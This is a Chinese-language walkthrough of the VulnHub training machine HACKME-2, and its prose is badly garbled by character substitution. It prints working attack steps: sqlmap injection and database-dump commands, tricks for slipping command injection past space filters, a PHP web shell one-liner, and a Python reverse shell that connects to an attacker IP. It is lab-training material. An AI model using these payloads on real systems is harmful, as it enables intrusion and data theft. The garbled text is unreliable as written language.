靶机渗透 HACKME-2 (详细渗透,得当新手渗透)
闲聊
1872 人阅读
|
0 人回复
|
|
<
靶机HACKME:2的目次
0x01靶机形貌
靶机根本疑息:
链接https://www.vulnhub.com/entry/hackme-2,618/做者x4bx54公布日期2020年12月6日易度中等靶机根本介绍:
hackme2”是一其中等易度的闭卡。那是hackme系列的第两部分,此中有更多的控件用于阻遏歹意进犯。别的,您借必需跳出框框去操纵那些破绽。目的是经由过程web破绽得到有限的权限会见,并随后以根用户身份晋级权限。创立该实施室是为了模仿实在天下的web破绽。
“hackme2”利用DHCP,并且正在mysqld能够自止封闭的状况下(十分有数的状况),测验考试强迫从头启动机器,然后机器该当能够一般事情。
0x02情况拆建
- 下载并导进靶机
翻开vmware–文件–翻开–hackme2-DHCP.ova
- 检察收集适配器
将靶机收集适配器改成NAT形式
- 启动靶机
面击 ▶靶机,开启胜利
0x03靶机排泄
1、 疑息收集
1. 主机发明
2. 端心扫描
- masscan --rate=100000 -p 0-65535 192.168.30.207
3. 具体扫描
- nmap -T4 -sV -O -p 22,80 192.168.30.207
4. gobuster停止目次扫描
- gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.30.207 -t 30
5. 网站指纹辨认
- whatweb http://192.168.30.207
2、 破绽发掘
sql注进
1. 进进主页发明是登录页里,出有效户名及暗码,可是页里有注册链接,停止注册用户
2.利用所注册的用户登岸胜利
3. 操纵sqlmap停止测试能否具有sql注进破绽
- sqlmap -u 'http://192.168.30.207/welcome.php' --data="search=OSINT" --cookie="PHPSESSID=boujv14h358os0cru6q5afevt9" --level=3 --risk=3
能够看出该出存正在sql注进破绽
4. 查询当前数据库
- sqlmap -u 'http://192.168.30.207/welcome.php' --data="search=OSINT" --dbs --cookie="PHPSESSID=boujv14h358os0cru6q5afevt9" --dbs --tamper space2comment.py --level=5 --risk=3
5. 查询当前数据库
- sqlmap -u 'http://192.168.30.207/welcome.php' --data="search=OSINT" --dbs --cookie="PHPSESSID=boujv14h358os0cru6q5afevt9" --current-db --tamper space2comment.py --level=5 --risk=3
6. 查询当前数据中一切的表
- sqlmap -u 'http://192.168.30.207/welcome.php' --data="search=OSINT" --dbs --cookie="PHPSESSID=boujv14h358os0cru6q5afevt9" --tamper space2comment.py --level=5 --risk=3 -D webapphacking --tables
7. 查询users表中一切的列
- sqlmap -u 'http://192.168.30.207/welcome.php' --data="search=OSINT" --dbs --cookie="PHPSESSID=boujv14h358os0cru6q5afevt9" --tamper space2comment.py --level=5 --risk=3 -D webapphacking -T users --columns
8. 查询users表中的数据
- sqlmap -u 'http://192.168.30.207/welcome.php' --data="search=OSINT" --dbs --cookie="PHPSESSID=boujv14h358os0cru6q5afevt9" --tamper space2comment.py --level=5 --risk=3 -D webapphacking -T users -C user,name,password --dump
然后我们对用户superadmin停止解稀
- 2386acb2cf356944177746fc92523983 Uncrackable
文件上传破绽
1. 我们对刚所获得的superadmin用户停止登录
正在那里发明了文件上传面,也发明了一处查询用户形态进口
2. 颠末考证,上传假图片头木马战图片马时,修正后缀均已失利了结,能够上传图片能够胜利
固然能够上传图片,可是uploads文件夹其实不存正在,并且我们借出有找到文件包罗面,以是我们需求持续寻觅其他破绽,换种解题思路
号令施行破绽
1. 脚工测试
Last Name 输进框中能够存正在号令施行破绽
2. 停止考证
此处的确露有号令施行破绽
可是正在进一步的考证中发明号令施行却没有起感化,以是正在那里推测多是因为过滤空格招致的
- 一些绕过号令施行过滤空格的办法:
- < --> 重定背,如cat<flag.php
- <> --> 重定背,如cat<>flag.php
- %09 --> 需求php情况,如cat%09flag.php
- ${IFS} --> 纯真cat$IFS2,IFS2被bash注释器当作变量名,输没有出去成果,减一个{}便牢固了变量名,如cat${IFS2}flag.php
- $IFS$9 --> 前面减个$取{}相似,起截断感化,$9是当前体系shell历程第九个参数持有者,一直为空字符串,如cat$IFS2$9flag.php
- system('cat${IFS}/etc/passwd')
- system('cat$IFS$9/etc/passwd')
3、 破绽操纵
1. 能够停止号令施行,以是我们能够测验考试检察各类有效文件
正在检察的过程当中我们发明,当前页里welcomeadmin.php源码保守。我们停止检察,发明了图片上传后的途径,并且能够看出那里并且能够看到并出有过滤asp,aspx后缀文件
- cat${IFS}welcomeadmin.php
- 文件上传途径:
- /var/www/html/uploads/year2020/
- 即:http://192.168.30.207/uploads/year2020/
2. 上传一句话木马,蚁剑毗连失利
那里我们能够停止上传asp取aspx木马文件,并用蚁剑停止毗连,可是结果以失利了结
木马文件上传胜利
3. 对上传的文件会见并用菜刀毗连
毗连失利
4. 换种思路 号令施行+文件上传
我们如今能够停止号令施行(施行号令反弹shell失利,多是没有存正在这类反弹shell办法,大概是我施行有误,并出有施行胜利),也明白了文件上传后的途径,我们能够操纵号令施行破绽修正上传到效劳器的文件名,然落后止反弹shell
4.1 前里我们上传的phpinfo.jpg文件,我我们测验考试修正后缀,并停止会见
- system('mv${IFS}/var/www/html/uploads/year2020/phpinfo.jpg${IFS}/var/www/html/uploads/year2020/phpinfo.php')
4.2胜利会见phpinfo页里
- http://192.168.30.207/uploads/year2020/phpinfo.php
5. 反弹shell
5.1上传图片马sysexec.jpg
- 图片马中的剧本:
- <?php @system($_GET[cmd]);?>
5.2 操纵号令施行停止修正后缀
- system('mv${IFS}/var/www/html/uploads/year2020/sysexec3.jpg${IFS}/var/www/html/uploads/year2020/sysexec3.php')
5.3 借用hackbar东西会见url,反弹shell
那里给各人保举一个正在线天生反弹shell号令的网站
https://weibell.github.io/reverse-shell-generator/
- 192.168.30.207/uploads/year2020/sysexec3.php?cmd=export RHOST="192.168.30.182";
- export RPORT=8888;
- python -c 'import sys,socket,os,pty;
- s=socket.socket();
- s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));
- [os.dup2(s.fileno(),fd) for fd in (0,1,2)];
- pty.spawn("/bin/sh")'
胜利反弹shell
4、 提权
1. 先用python翻开一个尺度的shell
- python -c 'import pty;pty.spawn("/bin/bash")'
2. 我们挑选出可登录的用户
- cat /etc/passwd | grep bash
3. 去抵家目次下,发明有一个legacy目次(并非用户)
4. 进进了legacy目次,发明可施行的两进造文件,施行,提权胜利
0x04实施总结
那个靶机的易度适中,经由过程那个靶机的联系,觉得更能够加强本人对那些破绽施行的连接性,靶机次要考查了目次扫描,sql注进(那里要绕过空格过滤),文件上传取号令施行的结合,反弹shell及提权。该靶机能够串连各部分常识,值得一做
免责声明:假如进犯了您的权益,请联络站少,我们会实时删除侵权内乱容,感谢协作! |
1、本网站属于个人的非赢利性网站,转载的文章遵循原作者的版权声明,如果原文没有版权声明,按照目前互联网开放的原则,我们将在不通知作者的情况下,转载文章;如果原文明确注明“禁止转载”,我们一定不会转载。如果我们转载的文章不符合作者的版权声明或者作者不想让我们转载您的文章的话,请您发送邮箱:Cdnjson@163.com提供相关证明,我们将积极配合您!
2、本网站转载文章仅为传播更多信息之目的,凡在本网站出现的信息,均仅供参考。本网站将尽力确保所提供信息的准确性及可靠性,但不保证信息的正确性和完整性,且不对因信息的不正确或遗漏导致的任何损失或损害承担责任。
3、任何透过本网站网页而链接及得到的资讯、产品及服务,本网站概不负责,亦不负任何法律责任。
4、本网站所刊发、转载的文章,其版权均归原作者所有,如其他媒体、网站或个人从本网下载使用,请在转载有关文章时务必尊重该文章的著作权,保留本网注明的“稿件来源”,并自负版权等法律责任。
|
|
|
|
|
|
|
|
|
